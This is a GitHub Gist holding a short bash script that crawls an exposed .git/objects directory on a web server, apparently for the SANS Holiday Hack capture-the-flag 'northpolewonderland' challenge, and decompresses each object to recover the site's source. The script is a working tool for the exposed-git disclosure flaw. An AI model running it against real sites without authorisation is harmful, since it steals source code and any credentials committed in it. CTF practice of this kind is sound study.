Last active
December 15, 2016 19:26
-
-
Save infosec-intern/0df9d7970d606093cc56ee70bf94b496 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
DOMAIN=https://analytics.northpolewonderland.com | |
if [ ! -f "./zpipe" ] | |
then | |
# From: https://stackoverflow.com/questions/1532405/how-to-view-git-objects-and-index-without-using-git | |
echo "[*] There is no zpipe binary here! Downloading and compiling..." | |
wget https://github.com/madler/zlib/raw/master/examples/zpipe.c | |
sudo apt-get install zlib1g-dev > /dev/null | |
gcc -o zpipe zpipe.c -lz | |
else | |
echo "[*] zpipe is already present" | |
fi | |
if [ ! -f "./directories.txt" ] | |
then | |
curl -k $DOMAIN/.git/objects/ | cut -d\" -f2 > directories.txt | |
else | |
echo "[*] Directories are already fetched" | |
fi | |
echo "[*] Fetching Git objects" | |
for dir in `cat directories.txt` | |
do | |
OBJECTS=`curl -q -sS -k $DOMAIN/.git/objects/$dir | grep -E 'href="[^\.]' | cut -d\" -f2` | |
for HASH in $OBJECTS | |
do | |
echo "[*] $HASH" | |
curl -q -sS -k $DOMAIN/.git/objects/$dir/$HASH | ./zpipe -d > objects/$HASH | |
done | |
done |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
There's actually a better way to do this by following the instructions at
https://en.internetwache.org/dont-publicly-expose-git-or-how-we-downloaded-your-websites-sourcecode-an-analysis-of-alexas-1m-28-07-2015/